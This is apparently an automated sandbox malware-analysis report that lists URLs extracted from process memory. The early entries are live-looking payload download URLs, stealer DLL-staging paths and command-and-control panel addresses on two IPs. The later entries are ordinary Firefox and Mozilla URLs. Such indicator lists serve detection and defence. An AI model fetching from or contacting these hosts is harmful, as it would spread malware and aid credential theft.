Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exeM32
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exera
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe393d
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exencoded
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exerb
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/00003002
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/15.113.19/3405117-2476756634-1003(
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/238F-46AF-ADB4-6C85480369C7
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php&b~
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php(8)
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php/
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php00003002
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php5
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php8
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php=
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpEscape
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php_
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpaa32fec17.exe.mun
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpe
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpi
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phps
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsm
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsoft
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpu
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/c0f9c30b4baed74c61395d7fac00b58987e8e8fda7df30804042ba5ce902415450#1.
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ows
Source: 7ca32398cd.exe, 00000014.00000002.2836006553.000000000266E000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/1
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpE
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpJ
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpOoAS
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpR
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpX
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpf
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phplegram
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phplg2
Source: file.exe, 00000000.00000002.2398151392.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phps
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpw2
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpx
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpz
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/7w
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll$t
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dllCt
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2398151392.000000000046A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/Fg
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/L
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/Tg
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/X
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/cw
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.0000000002698000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/h
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/n
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/pData
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/v
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/xg
Source: file.exe, 00000000.00000002.2398151392.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31s
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 00000021.00000003.3152588745.00000169CE4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3392258143.00000169CAECB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141099492.00000169D9BFB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000021.00000003.3414144429.00000169CAEB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3139946227.00000169D9D3E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000021.00000003.3391044621.00000169CAF2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000021.00000003.3391044621.00000169CAF2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000021.00000003.3403954817.00000169CC1E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3228876656.00000169CA6E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3273698360.00000169CAAC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3039034257.00000169C6F3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066433550.00000169D9DE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3277818578.00000169CAAE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386641479.00000169CBCF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3286136241.00000169CAAC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3172465493.00000169CBD68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3080819409.00000169D9EF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3393234826.00000169CC1E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3309306098.00000169CC1E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948970212.00000169CA6F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3287194679.00000169CA6D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3268103076.00000169D9FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3287194679.00000169CA6E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3073977083.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3037729550.00000169D9EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3378661571.00000169D96A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000021.00000003.3336058593.00000169D393C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3141555486.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3232671051.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3329338474.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000021.00000003.3141555486.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3336058593.00000169D393C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3232671051.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3329338474.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: file.exe, file.exe, 00000000.00000002.2447822341.000000006CBAD000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000021.00000003.3239953611.00000169D3982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3123371774.00000169C9EC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245539528.00000169D34B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3172465493.00000169CBD43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3151922615.00000169D34B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3260285389.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3322568003.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341178431.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000021.00000003.3396520559.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245539528.00000169D34B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3151922615.00000169D34B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3322568003.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341178431.00000169D34B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: file.exe, 00000000.00000002.2446727241.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000021.00000003.3233159876.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: firefox.exe, 00000021.00000003.3141555486.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3232671051.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3329338474.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000021.00000003.3141555486.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3232671051.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3329338474.00000169D9BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000021.00000003.3381137545.00000169CD9B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3248971153.00000169CD9B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000021.00000003.3378661571.00000169D96A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5FE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3239255232.00000169D5FE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000021.00000003.3396520559.00000169D34FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3322568003.00000169D34FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341178431.00000169D34FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3120804832.00000169CBDBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: chromecache_259.35.dr String found in binary or memory: https://apis.google.com/js/api.js
Source: firefox.exe, 00000021.00000003.3344434976.00000169CE481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000021.00000003.3416346439.00000169CAC5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 00000021.00000003.3389754862.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400899355.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413469989.00000169CAF89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Win
Source: firefox.exe, 00000021.00000003.3389754862.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400899355.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413469989.00000169CAF89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/re
Source: firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3157569738.00000169CCD94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3254249599.00000169CCD94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3257562106.00000169CC3E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB2CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3301896945.00000169CB3C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3301896945.00000169CB3C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000021.00000003.3303414952.00000169CB3CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ep
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.epnacl
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2426906219.0000000028B90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000021.00000003.2928245347.00000169C974A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2921875534.00000169C9707000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
